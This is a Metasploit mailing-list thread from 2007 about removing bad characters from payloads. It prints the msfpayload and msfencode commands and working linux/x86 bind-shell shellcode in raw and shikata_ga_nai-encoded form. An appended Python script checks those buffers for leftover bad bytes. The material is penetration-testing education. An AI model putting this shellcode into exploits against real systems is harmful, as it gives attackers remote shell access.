Metasploit mailing list archives

Building multistage payloaded exploits?


From: j_fast_and_the_furious at hotmail.com (scotty to hotty)
Date: Mon, 24 Sep 2007 23:23:00 +0000


Darn it, and I actually have seen that command too :S I must've gone brain dead :P Thanks for the help, it really has
clarified a ton... Anyway, that will be enough interrogating from me tonight. And before I go I must say thanks for all
the great videos you made, AKA the DEFCON 15 speech.... I've learned a lot about pentesting just from that video.... Paterva's the best
:P


----------------------------------------
> From: hdm at metasploit.com
> To: framework at metasploit.com
> Date: Mon, 24 Sep 2007 18:10:10 -0500
> Subject: Re: [framework] Building multistage payloaded exploits?
>
> You are probably doing something wrong ;-) The msfpayload command only
> generates the raw shellcode, if you want to encode it, you need to
> generate it in "raw" mode, then pass it into msfencode, which takes
> the -b parameter defining the bad character set. For example:
>
> $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 C
> /*
>  * linux/x86/shell_bind_tcp - 78 bytes
>  * http://www.metasploit.com
>  * AppendExit=false, PrependSetresuid=false,
>  * PrependSetuid=false, LPORT=4444,
>  * PrependSetreuid=false
>  */
> unsigned char buf[] =
> "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
> "\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
> "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
> "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
> "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
> "\x0b\xcd\x80";
>
> # now, let's remove the 0xcd and 0x80
>
> $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | \
>   msfencode -a x86 -b '\xcd\x80' -t c
>
> [*] x86/shikata_ga_nai succeeded, final size 106
>
> unsigned char buf[] =
> "\xba\x03\x52\xce\x1e\x29\xc9\xd9\xe9\xb1\x14\xd9\x74\x24\xf4"
> "\x5f\x31\x57\x13\x83\xef\xfc\x03\x57\x0f\xe2\xf6\x63\x15\xe9"
> "\x1b\xd0\xea\x45\xb1\xd5\x65\x88\xf5\xbc\xb8\xcb\xae\x1e\x11"
> "\xa4\xaf\x9d\x84\x68\x25\xb2\xf7\xc0\x30\x53\x9d\x86\x1a\x59"
> "\xe2\xce\xdb\x65\x50\xd4\x6b\x03\x5b\x55\xc8\x7c\x05\x9b\x4e"
> "\xef\x93\x49\x71\x48\xe9\x0e\xc4\x11\x09\x66\xf9\xce\x9a\x1f"
> "\x6d\x3e\x3f\x89\x03\xc9\x5c\x19\x88\x40\x43\x2a\x25\x9e\x04"
> "\x41";
>
>
> -HD
>
> On Monday 24 September 2007 18:02, scotty to hotty wrote:
>> Thanks hdm for clarifying my research :P. Now, I noticed problems when I
>> specify bad characters in Metasploit.... it always spits the payload
>> out with the bad characters still in the exploit.... When I use msf2 it
>> works fine, but when I use msf3 it keeps everything I specify to get
>> removed. Any workarounds to this problem? Or am I doing something
>> wrong?
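The question in this thread is really "how do I know the bad characters are actually gone?". The check below is an added example, not code from the thread or from the Metasploit project: it parses the `-t c` output that msfpayload/msfencode print, parses the `-b` argument in the same `\xNN` syntax, and lists every offset where a bad byte survives. The two C arrays embedded in it are copied from HD's reply above (the raw 78-byte bind shell and the 106-byte shikata_ga_nai output); the function names are mine. Run against the raw payload it reports the six `int 0x80` (`\xcd\x80`) instructions; run against the encoded payload it reports nothing, which is what you want to see before pasting the buffer into an exploit.

```python
"""Check an msfpayload/msfencode '-t c' dump for bad characters.

Added example for this thread, not code from the original post or from
Metasploit. The two buffers are copied from HD's reply; everything else
(function names, the report format) is this example's own.
"""
import re

# Copied from HD's post: raw linux/x86/shell_bind_tcp, 78 bytes.
RAW_BIND_SHELL_C = r'''
unsigned char buf[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80";
'''

# Copied from HD's post: the same payload after
# msfencode -a x86 -b '\xcd\x80' -t c  (x86/shikata_ga_nai, 106 bytes).
ENCODED_BIND_SHELL_C = r'''
unsigned char buf[] =
"\xba\x03\x52\xce\x1e\x29\xc9\xd9\xe9\xb1\x14\xd9\x74\x24\xf4"
"\x5f\x31\x57\x13\x83\xef\xfc\x03\x57\x0f\xe2\xf6\x63\x15\xe9"
"\x1b\xd0\xea\x45\xb1\xd5\x65\x88\xf5\xbc\xb8\xcb\xae\x1e\x11"
"\xa4\xaf\x9d\x84\x68\x25\xb2\xf7\xc0\x30\x53\x9d\x86\x1a\x59"
"\xe2\xce\xdb\x65\x50\xd4\x6b\x03\x5b\x55\xc8\x7c\x05\x9b\x4e"
"\xef\x93\x49\x71\x48\xe9\x0e\xc4\x11\x09\x66\xf9\xce\x9a\x1f"
"\x6d\x3e\x3f\x89\x03\xc9\x5c\x19\x88\x40\x43\x2a\x25\x9e\x04"
"\x41";
'''

_HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')


def c_array_to_bytes(text: str) -> bytes:
    r"""Collect every \xNN escape in a '-t c' dump into a bytes object.

    The C comment header msfpayload prints contains no \xNN escapes, so
    feeding the whole dump (comment included) is safe.
    """
    return bytes(int(h, 16) for h in _HEX_ESCAPE.findall(text))


def bad_chars_from_arg(arg: str) -> bytes:
    r"""Parse a msfencode -b argument such as '\x00\xcd\x80' into bytes."""
    return c_array_to_bytes(arg)


def find_bad_chars(payload: bytes, bad: bytes) -> list:
    """Return [(offset, value), ...] for every payload byte in the bad set."""
    badset = set(bad)
    return [(i, b) for i, b in enumerate(payload) if b in badset]


def report(label: str, payload: bytes, bad: bytes) -> str:
    """Human-readable summary: which bad bytes survive, and where."""
    hits = find_bad_chars(payload, bad)
    lines = [f"{label}: {len(payload)} bytes, {len(hits)} bad byte(s)"]
    for offset, value in hits:
        lines.append(f"  offset {offset:3d}: \\x{value:02x}")
    return "\n".join(lines)


if __name__ == "__main__":
    bad = bad_chars_from_arg(r'\xcd\x80')
    # Raw payload: every int 0x80 (\xcd\x80) shows up as two hits.
    print(report("raw", c_array_to_bytes(RAW_BIND_SHELL_C), bad))
    # Encoded payload: the decoder stub and encoded body avoid both bytes.
    print(report("encoded", c_array_to_bytes(ENCODED_BIND_SHELL_C), bad))
```

If the encoded output still reports hits, the bytes were not passed to msfencode at all (for example, the `-b` set was given to msfpayload, which ignores it); the `R` output piped into `msfencode -b` is the only place the filtering happens.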


